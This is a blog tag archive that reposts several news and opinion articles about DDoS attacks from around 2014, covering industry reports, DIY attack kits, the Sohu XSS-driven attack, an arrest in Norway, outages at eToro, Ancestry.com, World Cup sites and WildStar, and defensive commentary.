Tag Archives: dos attacks

DDoS attacks grow as first DIY kits emerge

Alongside the report, Trustwave is reporting the discovery of DIY DDoS kits for sale from just US$ 200 (£118) and which give users – apart from a high bandwidth connection – all they need to stage a wide-scale attack. The analysis – from Prolexic Technologies, now part of Akamai – claims to show that distributed denial of service activity has surged by 22 percent over the last quarter, putting levels close to those seen in Q1 of this year, when existing DDoS volume and allied records were broken. Delving into the report reveals there was a 72 percent increase in the average bandwidth of attacks during the second quarter, along with a shift to reflection-based attacks that undermine common web protocols, as well as the arrival of server-side botnets that exploit web vulnerabilities in Windows and Linux-based systems. The analysis concludes that there have been shifts in the industry targets compared with last quarter’s DDOS activity. The difference in these numbers, says the report, may be due to the different types of malicious actors on the Internet that may be active at any particular time. “It is clear that the majority of malicious actors preferred to use of volumetric attacks in Q2 – this trend was seen across all verticals. A significant variant in attack vectors by industry was the use of a very sophisticated botnets against financial and media sites,” notes the report, adding that these attacks do not seem to fit the previous patterns and motives of the DDoS criminal ecosystem. According to Trustwave, meanwhile, its research has revealed that hackers are now selling the Neutrino Bot malware kit, which it can be used to infect a large number of computers, create a botnet, and launch DDoS attacks against websites and services at will. For US$ 500 (£294), meanwhile, hackers will sell all comers BetaBot 1.6, which Trustwave says is a remote access Trojan that can run DDoS attacks, and steal sensitive data, passwords and files from infected systems. Karl Sigler, Trustwave’s threat intelligence manager, said he was unsurprised by the findings. “Supply and demand affects malware markets like they do any market. Even though demand is high, there is an increasing amount of malware competing with each other and this helps drive down the cost. There is also a cost-benefit issue. Criminals look at how much they can make by selling stolen data acquired using the malware. Finally, age plays a role. The longer malware is on the market, the cheaper it tends to get,” he said. Rob Bamforth, a principal analyst with Quocirca, the business analysis and research house, said that the surge in volumes and incidences of DDoS attacks in the second quarter identified by Akamai suggests a larger number of servers being infected by cyber-criminals – coupled with the fact that that many systems `out there’ are Windows XP-based, which has become a legacy operating system since it reached end-of-life with Microsoft back in April. “It also suggests there is a degree of complacency in the business sector, with many managers saying they do not want to invest extra money in IT security, as they do not see a return. Many businesses are suffering an ongoing squeeze on costs, so a failure to invest in security is understandable, even if it is not the correct approach to take,” he told SCMagazineUK.com . Nick Mazitelli, a senior consultant with Context Information Security, meanwhile, said that Akamai’s analysis that the widespread dissemination of increasingly capable attacker toolsets is a trend we see right across the threat landscape, from cyber-crime through to state-sponsored attacks and everything in between. “On the one hand this trend is fuelled by the on-going professionalisation and commoditisation of criminal marketplaces, and on the other by increasing levels of interconnection between threat groups of all stripes. Not only does this mean that existing threat groups have access to improved capability, but it also lowers the barrier of entry for newcomers thereby increasing the number of malicious parties active in the landscape – both factors that unavoidably increase the tempo of what is effectively an arms race between attacker and defender,” he said. “With this increased tempo as background it is important to highlight the necessity of a flexible and adaptable approach to security based on a sound understanding of the threat landscape. In particular those aspects of security concerned with network security monitoring as well as incident response are areas that have often been overlooked in the past, but are critical components of effectively managing the risk and minimising the potential impact of these constantly evolving threats,” he added. Source: http://www.scmagazineuk.com/ddos-attacks-grow-as-first-diy-kits-emerge/article/362573/

Excerpt from:
DDoS attacks grow as first DIY kits emerge

“Chinese YouTube” Used as DDoS attack Machine

Even the biggest websites in the world are vulnerable to DDoS. Want proof? Well, all throughout this past April, a hacker took advantage of a hole in Sohu.com’s security to launch Persistent Cross-Site Swapping (XSS) attacks against various targets across the globe. Sohu.com, in case you don’t know, is one of the largest websites in the world – in fact 24th largest, according to Alexa Top 100 Ranking. But, for all its size and multi-billion dollar net worth, Sohu could be exploited by hackers who managed to convert its popularity into a massive Persistent XSS enabled DDoS attack. Devastating New DDoS Attack Method At its basis, Persistent XSS is a crafty type of malicious code injection. This injection method involves convincing a server to save data from an outside source (the hacker) and then refresh the data every time a new browser accesses the page. In this attack, the hacker saved to Sohu’s server a JS script that runs a DDoS tool. To do this, he placed a malicious JS script within the avatar image of a fabricated user profile. As with most video sites, this infected user picture would then show up next to any comments wrote by this profile, on Sohu’s video pages. The hacker was smart enough to write a JS script that would hijack every new browser that accessed a video page with the infected comment, forcing it to run a sent DDoS to the target site. The hacker programmed the script to send GET requests to the target once a second. Imagine; thousands of users watching a video on Sohu sending malicious GET requests every second. These bad requests add up quickly, quickly growing to millions every minute. Interestingly enough, the hacker also had the brains to put his infected comment on the most popular and longest playing videos, so the viewers would rack up DDoS requests even faster. This large security event goes to show that even powerful websites can be manipulated by hackers. Where Will the Next Attack Come From? It’s difficult to say. This case study shows that hackers will use whatever means necessary to take down their targets. Without 3rd party protection services, most websites can only defend what they’ve seen already–they can only react after they have been hit. In this instance, the hacker was clever enough to fly under the radar and avoid detection by Sohu’s watchful IT team. If the hacker had chosen a target without a DDoS protection service, Sohu might still be a giant DDoS machine causing havoc on innocent websites. Source: http://www.economicvoice.com/chinese-youtube-used-as-ddos-machine/

Continue Reading:
“Chinese YouTube” Used as DDoS attack Machine

17-Year-Old Behind Norway DDoS Attacks This Week

On Thursday, the Norwegian police have arrested and charged a 17-year-old in connection to the recent massive distributed denial-of-service (DDoS) attacks directed at major financial institutions and other businesses in the country. The teen, from the city of Bergen, on Norway’s west coast, claimed to be part of the hacktivist group Anonymous Norway, who, in a Twitter message, dismissed any connection to him or the DDoS incidents. On the day of the attack, the teenager sent a letter to the media, claiming to be part of Anonymous and saying that “the motivation behind the current attacks and the next attacks in the future is to get the community to wake up. The number of major IT security attacks is increasing and there is nothing being done to prevent such events.” Evidence that Anonymous Norway was not involved in the incidents is the fact that the boy joined the group’s Facebook page on the same day of the attack. Furthermore, the hacker outfit provided a Pastebin link in a new tweet, pointing to the identity of the perpetrator; they did not create the post, just scooped it up. Initially, the youngster was charged with gross vandalism, which carries a maximum prison sentence of six years in Norway. However, since he has no record and is still a minor, this should be greatly reduced. According to News in English, Frode Karlsen of the Bergen police told Norwegian Broadcasting that the authorities are taking the matter seriously because this sort of attack can have significant impacts on society, like individuals not being able to reach emergency services in case they needed help. After his arrest, the teen cooperated in the investigation and clarified the nature of his actions. His defense lawyer stated that “he’s sorry for having caused all this and has laid his cards on the table.” The DDoS attack, which occurred on Tuesday, was considered among the largest ever seen in Norway and leveraged the vulnerable “pingback” WordPress feature. Its increased significance is due to the fact that it targeted layers three (network) and four (transport) of the OSI model, as well as layer seven (application), at the same time. Mitigating an application layer DDoS attack is not too easy, because the requests are directed at the application interface and mimic legitimate behavior, which makes filtering out the bad traffic more difficult. The attack aimed at disrupting the online services of major financial institutions in Norway (Norges Bank, Sparebank 1, Storebrand, Gjensidige, Nordea, Danske Bank), as well as other business, like Scandinavian Airlines (SAS) and Norwegian Air. The website of the largest telecommunications company in Norway, Telenor, was also affected. Source: http://news.softpedia.com/news/17-Year-Old-Behind-Norway-DDoS-Attacks-this-Week-450391.shtml

Read the article:
17-Year-Old Behind Norway DDoS Attacks This Week

eToro’s Website down Due to Malicious DDOS Attacks, Functionality Restored

Thursday has turned out to be somewhat of a more busy day for social trading platform eToro than usual. According to a company statement, the company’s service has been under attack by a malicious group of attackers since 07:12 GMT. After numerous complaints by customers of the firm, a thorough statement has been provided by eToro’s CEO, Yoni Assia. “I am sure that by now, most of you are already aware of the fact that our platform was under attack by a malicious group of hackers. I realize that many of you may be frustrated, angry, or simply worried following the unusual service interruptions that happened on Thursday, July 3rd and I wanted to contact you personally to apologize and explain what happened. Since 07:12 GMT, July 3rd, eToro has been the target of a criminal DDoS attack – a technique used by hackers to take an internet service offline by overloading its servers. (To read more about DDoS attacks:http://en.wikipedia.org/wiki/Denial-of-service_attack). I believe the choice to attack today was not a random one, as both you and eToro have been gearing up for today for the better part of the week. We had everything in place for you to experience a great day of trading, with the NFP announcement. I speak for everyone at eToro when I say that we deeply regret that this experience was denied you. We have robust systems in place to deal with such instances; however the scale of this particular attack caused our platform to experience significant downtime. All your personal data, including billing information, financial information and personal details is secure. More than that, throughout today we offered several alternatives for those of you who wanted to close a position, in order to give you as much control as was possible with regard to your portfolio. The status right now is that we were successful in restoring all of our services. Regrettably, as with attacks such as this, we might see more interruptions in the next few days. It is my personal goal to make sure you receive the best experience possible and I guarantee that all of us here at eToro are working around the clock to make sure this is exactly what you get. Our technical and service teams are at your disposal and are working non-stop to help each and every one of you resolve any issue affecting your personal account.” Update: On Friday morning in Europe, users have been reporting troubles with website and app functionality, and issues with logging in. Around 9BST, the status of the website was updated by the company, with eToro stating that currently it’s up and running, despite still being under attack. According to a company spokesperson, the malicious attempts are now blocked before they can affect eToro’s community. Source: http://forexmagnates.com/etoros-website-down-due-to-malicious-ddos-attacks-restored-only-to-go-dark-again/#sthash.PWXi3f61.dpuf

Continued here:
eToro’s Website down Due to Malicious DDOS Attacks, Functionality Restored

Could Cookies Be Used to Launch DoS Attacks?

Giant cookies could be used to create a denial of service (DoS) on blog networks, says infosec researcher Bogdan Calin. Such an attack would work by feeding users cookies with header values so large that they trigger web server errors. Calin created a proof of concept attack against the Google Blog Spot network after a customer reported problems with internal security testing. In his subsequent tests, he found that if one sends many cookies to a browser, sets them to never expire and includes pointers to a blog network’s root domain, the user won’t ever be able to see any blogs on the service. Victims can tell if supersized cookies have been stuffed down their browser’s throats when 400 errors such as “Your browser sent a request that this server could not understand. Size of a request header field exceeds server limit” appear. Sydney security bod Wade Alcorn (@WadeAlcorn) said the attack would work if custom cookies could be set. “This attack, denial-of-service by cookies, sets many long cookies, forcing the browser to create a very long request [that] is too long for the server to handle, and simply returns an error page,” Alcorn said. “The vulnerable browser won’t be able to visit that origin until the cookies are cleared. “When a browser visits one of these [user-controlled] subdomains it will allow a cookie to be set on the parent domain [which] means that when a denial-of-service by cookies attack is launched, the victim browser will not be able to visit the parent domain or any of the subdomains.” For an application to be vulnerable it must provide an opportunity for the attacker to set custom cookies in the victim’s browser, Alcorn pointed out. Chrome users were not affected when perusing Blog Spot but were on other unnamed domains. Alcorn said a Google security rep told him the risk was a problem for web browser developers to fix, rather than a lone web app providers, and welcomed ideas that could squash the vector. Source: http://www.theregister.co.uk/2014/07/02/monster_cookies_can_nom_nom_nom_all_the_blogs/

Read this article:
Could Cookies Be Used to Launch DoS Attacks?

Ancestry.com working to fully restore services following DDoS attack

The genealogy website Ancestry.com is working to fully restore its service after it was hit by a Distributed Denial of Service attack. Company spokeswoman Heather Erickson says it means ancestry.com was overwhelmed with bogus traffic Monday. “The attack was overloading our systems with massive amounts of traffic, but it did not access any data in servers,” Erickson said. The site, which has more than 2 million subscribers, was down for much of Tuesday and wasn’t fully operational Wednesday afternoon. Its Web team neutralized the DDoS attack and was working to fully restore services. “This has been a very frustrating and overwhelming experience, and our teams have been fantastic, working around the clock to make it neutralized,” Erickson said. Company officials are hoping to fully recover from the attack soon. Ancestry.com is posting updates on its Facebook and Twitter pages. Erickson said she doesn’t know where the attack came from. “These types of attacks aren’t unique to Ancestry. We know of many other companies that have been victim to these types of attacks. It’s unfortunate that any company has to go through something like this,” she said. The attack also impacted Ancestry.com’s sister site Find a Grave, though as of Wednesday afternoon it was back up, according to its Facebook page. Company officials said the sync and search feature in Family Tree Maker were still disabled until the site stability had been fully restored. They recommended people use the feature offline. Source: http://www.deseretnews.com/article/865605393/Ancestrycom-working-to-fully-restore-services-following-DDoS-attack.html

More:
Ancestry.com working to fully restore services following DDoS attack

World Cup websites struck down by DDoS attacks

Various websites associated to the World Cup have been struck by a distributed denial of service (DDoS) attack ahead of the tournament’s opening match on Thursday. The official government World Cup website has been down for more than a day, as well as the websites of some host states. Hacking collective Anonymous has claimed responsibility for the attacks. The hacker group has published a list of over 60 websites that have successfully taken down and are still offline at the time of writing, including as the Brazil website of recording giant Universal Music. Public figures that are perceived by the hackers as supportive of the government and the World Cup are also being targeted. Various performers such as Caetano Veloso, Mariana Aydar, and Filipe Catto have had the content of their websites replaced by anti-FIFA messages or taken down. Last month, the internal communications system of the Brazilian Ministry of External Relations was also hacked, with a possible leak of confidential information. Even though Anonymous has not claimed direct responsibility for the attack, it has released a YouTube video justifying it and citing general dissatisfaction with the World Cup. Back in February, the hackers said they were preparing for a string of cyberattacks to FIFA and sponsor websites during the World Cup, including DDoS attacks, as well as website defacement and data theft. The Anonymous group has vowed to continue the attacks and is posting regular updates on Twitter under the hashtags #OpHackingCup and #OpWorldCup. Source: http://www.zdnet.com/world-cup-websites-struck-down-by-ddos-attacks-7000030479/#ftag=RSSbaffb68

See the article here:
World Cup websites struck down by DDoS attacks

Facing a criminal DDoS attack

Distributed denial of service (DDoS) attacks attempt to flood a server with so many requests that they render a website useless. The effects are many, from lost customer conversions and revenue to punished SEO ranking and blacklisting. The reality is that DDoS attack methods and the criminals behind them are evolving. Understanding this evolution is key to making sure companies that place any sort of importance on their websites stay protected. The type and style of attack is changing – there are headless browsers and application layer attacks, and DDoS attacks as cover for more sinister cyberattacks. Every reseller with security in the portfolio needs to understand that DDoS is not a static problem that can be dealt with and then ignored. It changes, and the tactics for defending against this type of attack need to advance even faster. Better general awareness about DDoS attacks has forced attackers to develop new ways to get around the basic defences. Media attention on high-profile DDoS attacks attracts activists with a message. Groups try to outdo one another in a bid for attention. A growing variety of coding practices, web platforms and web design features have multiplied the number of variables which can result in application exploits, rendering a website useless. With more access to high-CPU devices available through the cloud and dedicated hosting, DDoS attackers can now use those CPUs to run more sophisticated attacks. For these reasons, we are seeing more sophistication in attack style, meaning there is less volume and attackers are targeting very specific vulnerabilities in a website by doing their homework to make sure they target the weakest points. One of the stealthiest methods is headless browsers. These can be a clever way for cybercriminals to get around standard DDoS protection and masquerade as legitimate web traffic. The kit itself is used for programmers to test their websites, so to all intents and purposes, it is a legitimate browser web kit, just modified to run a series of queries and target basic web user interfaces. Detection is difficult and stopping a headless browser DDoS attack can take a trained professional to spot and remediate it. Importantly, with headless browsers Javascript and Captcha can be processed and can jump through the hoops, as it were, of the website, as it was designed for testing. This will be a big problem for more traditional DDoS protection, such as box solutions. What will be most effective here is real-time support, where there is a human involved who can develop some rule sets to determine what is going on and implement the modules within seconds. Application layer attacks are also becoming more prevalent, although you might not even notice them, if you don’t know what you are looking for. Attackers are getting better at reconnaissance and research, facilitating smarter attacks that can keep the volume low and under the radar, meanwhile killing the site in the background and fooling IT into spending time on the wrong part of the site when it is down. It is these application attacks and headless browser attacks that we see as the biggest concern for the future. I can only surmise that media hype is fuelling the focus on volumetric DDoS attacks, which is where the industry seems to be concentrating to meet customer expectations. Actually there is a rise in application attacks and we should be educating companies about these threats, as they indicate serious consequences for businesses that place any sort of importance on their websites. Jag Bains is chief technology officer of DOSarrest Source: http://www.channelweb.co.uk/crn-uk/opinion/2348218/facing-a-criminal-denial-of-service

See the original post:
Facing a criminal DDoS attack

Hacktivist Warns World Cup Sponsors Anonymous DDoS Attack is Coming

Che Commodore claims groups have already tested which are the most vulnerable sites. A hacktivist claiming to be affiliated with infamous online collective Anonymous has said the group is planning to DDoS various high profile sponsors of the forthcoming FIFA World Cup this month. The hacker, who goes under the name “Che Commodore”, told Reuters in a Skype interview from Brazil that Anonymous had already begun planning the campaign, designed to protest the vast sums of money being thrown at the event when the country still suffers severe social inequality. “We have already conducted late-night tests to see which of the sites are more vulnerable,” he said. “We have a plan of attack.” The targeted firms on the Anonymous shortlist apparently include Budweiser, Adidas, Emirates and Coca-Cola – all major sponsors of the tournament, the biggest single-event sporting competition in the world. If it goes ahead, the DDoS campaign will be the second major attack by Anonymous in the region in recent days. Another hacktivist, known as AnonManifest, used a phishing attack to penetrate the Foreign Ministry’s network last week and exfiltrate over 300 confidential documents which were later posted online, the report claimed. The ministry’s email system was apparently taken down as a result and 3,000 account holders told to change their passwords. Civil unrest directed mainly at the Brazilian government has marred the build-up to a World Cup which has already cost £9 billion – money they think would be better spent on improving things like social welfare and public services. In June 2013, over one million people took to the streets of more than 100 cities in violent protests against the spiralling costs of the tournament. David Howorth, VP at Alert Logic, said that the threat of attack during a major tournament like the World Cup is heightened due to the global exposure it gives hacktivists. He urged high profile sponsors to work with their network vendors to plan a DDoS prevention strategy; ensure all apps are up-to-date and patched; and that firewall, IDS and web application firewalls are configured correctly. “Make sure you have expertise that can monitor, correlate and analyse the security threats to your network and applications across your on-premise and cloud infrastructure 24×7 for continuous protection – this should be done now as the hackers are already testing the vulnerabilities in the infrastructure in preparation of their attacks,” he added. “Finally, remember that hackers are creative – don’t just focus on one attack vector as the attacker will try multiple ways to cause damage.” Source: http://www.infosecurity-magazine.com/view/38657/hacktivist-warns-world-cup-sponsors-anonymous-ddos-attack-is-coming/

More:
Hacktivist Warns World Cup Sponsors Anonymous DDoS Attack is Coming

WildStar early access period derailed by DDoS attacks

WildStar was set to launch for early buyers an hour ago, giving those folks a chance to jump into the game’s world days before everyone else. Unfortunately for those players (including our own Giant Robots In Disguise guild), WildStar is experiencing server issues and the developers are pointing the finger at a DDoS attack. WildStar executive producer Jeremy Gaffney posted on Reddit, “I’ve heard from a few folks it’s a confirmed DDOS attack (real time updates, may change, fog of war, etc.). Partially handled. Servers taking in some players now, player counts rising. Ninjitsu continues.” The best suggestion for now is to keep hammering away. The early bird period lasts all the way up to WildStar’s official release on June 3. Source: http://www.shacknews.com/article/84738/wildstar-early-access-period-derailed-by-ddos-attacks

Read the article:
WildStar early access period derailed by DDoS attacks